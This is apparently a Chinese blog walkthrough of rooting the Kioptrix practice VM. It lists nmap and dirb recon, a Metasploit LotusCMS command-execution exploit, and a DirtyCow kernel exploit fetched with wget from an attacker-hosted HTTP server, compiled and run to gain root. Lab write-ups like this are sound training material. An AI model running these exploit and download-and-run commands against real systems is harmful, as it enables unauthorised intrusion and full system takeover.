夫学须静也,才须学也;
非学无以广才,非志无以成学
00 环境准备
Kali(IP:10.10.16.128)
Koiptrix 靶机
NAT 网络连接
01 主机发现
nmap -sP 10.10.16.0/24
02 端口扫描
nmap -A -v -sS -sV -p- -T4 10.10.16.153
开放 22(ssh)/ 80(http) 端口
03 目录扫描
dirb http://10.10.16.153
得到数据库登录界面 /phpmyadmin
04 漏洞挖掘
根据靶机的描述,在访问靶机的时候先在本地 hosts 文件中添加靶机 IP 和靶机域名的映射。
① 访问目录
② LotusCMS
对于登录界面,常规的弱口令和爆破都没用。但是在用户登录界面看到 LotusCMS ,可以谷歌或者直接去在线漏洞库查找该 CMS 对应的漏洞。
漏洞库1
漏洞库2
发现 LotusCMS 3.0 的版本存在过远程命令执行漏洞,并且收录在 msf 中
05 漏洞利用
① getshell
msfconsole #开启 msf
search lotuscms #查找对应 exploit 模块
use exploit/multi/http/lcms_php_exec #使用该模块
show options #显示需要的参数
info #显示整个 exploit 的信息
这里注意到需要带入参数 RHOSTS 和 URI(默认 /lcms/),由于不存在 /lcms/ 目录,所以默认使用的话该 exploit 会不起作用,不能反弹 shell
set rhosts 10.10.16.153
set uri /
exploit
shell #获取原生 shell
python -c 'import pty;pty.spawn("/bin/bash")' #获取完全交互式 shell
② 提权
- 得到 shell 之后就剩提权了,使用 ==uname -a == 得到当前靶机系统内核版本,这里使用 Linux 提权辅助工具 Linux-exploit-suggester 对靶机内核进行漏洞搜索。
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh #下载 linux-exploit-suggester
./linux-exploit-suggester.sh -k 2.6.24 # 搜索内核 2.6.24 版本的漏洞
- 在 Kali 中下载 dirtycow 2 (Download URL) 到 /tmp 目录下,开启 HTTP 服务供靶机下载脚本。
wget https://www.exploit-db.com/download/40839
python -m SimpleHTTPServer 80
- 靶机下载脚本之后查看,发现使用了该脚本攻击之后,默认的管理员账号是 firefart,编译脚本的方法,还可以修改管理员密码,提权的方式等等。
wget http://10.10.16.153/40839
cat 40839 #查看脚本信息
- 在编译这里遇到一个问题,在前面下载脚本的时候文件名 48039 ,是一个 C 文件,但是没指定后缀名,导致 GCC 编译器编译的时候出错。
mv 40839 dirty.c #修改文件名
gcc -pthread dirty.c -o dirty -lcrypt
- 运行文件并提权。
./dirty
su firefart #提权
③ flag
flag 在 /root/Congrats.txt 中。
06 后续
本次 getshell 到提权利用的是 lotusCMS 的漏洞和内核的版本的漏洞,前面目录扫描得到的许多信息也存在着漏洞,同样也可作为切入点 getshell ,下一次记录时再续吧。
猪头
2020.3.17
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
